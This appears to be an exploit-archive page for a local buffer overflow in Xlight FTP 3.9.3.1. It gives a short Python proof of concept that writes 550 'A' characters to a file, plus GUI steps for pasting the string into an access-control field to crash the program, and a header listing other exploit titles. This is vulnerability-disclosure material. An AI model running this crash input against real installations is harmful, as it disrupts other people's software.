
5 changes to exploits/shellcodes Xlight FTP 3.9.3.1 - Buffer Overflow (PoC) Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS) WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS) Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)
32 lines
No EOL
1.1 KiB
Python
Executable file
32 lines
No EOL
1.1 KiB
Python
Executable file
# Exploit Title: Xlight FTP 3.9.3.1 - 'Buffer Overflow' (PoC)
|
|
# Discovered by: Yehia Elghaly
|
|
# Discovered Date: 2021-11-12
|
|
# Vendor Homepage: https://www.xlightftpd.com/
|
|
# Software Link: https://www.xlightftpd.com/download/setup.exe
|
|
# Tested Version: 3.9.3.1
|
|
# Vulnerability Type: Buffer Overflow Local
|
|
# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64
|
|
|
|
# Description: Xlight FTP 3.9.3.1 'Access Control List' Buffer Overflow (PoC)
|
|
|
|
# Steps to reproduce:
|
|
# 1. - Download and Xlight FTP
|
|
# 2. - Run the python script and it will create exploit.txt file.
|
|
# 3. - Open Xlight FTP 3.9.3.1
|
|
# 4. - "File and Directory - Access Control List - Setup - Added users list directories
|
|
# 5. - Go to Specify file or directory name applied or Specify username applied to or Specify groupname applied
|
|
# 6. - Go to Setup -> added -> Enter new Item - Paste the characters
|
|
# 7 - Crashed
|
|
|
|
#!/usr/bin/python
|
|
|
|
exploit = 'A' * 550
|
|
|
|
try:
|
|
file = open("exploit.txt","w")
|
|
file.write(exploit)
|
|
file.close()
|
|
|
|
print("POC is created")
|
|
except:
|
|
print("POC not created") |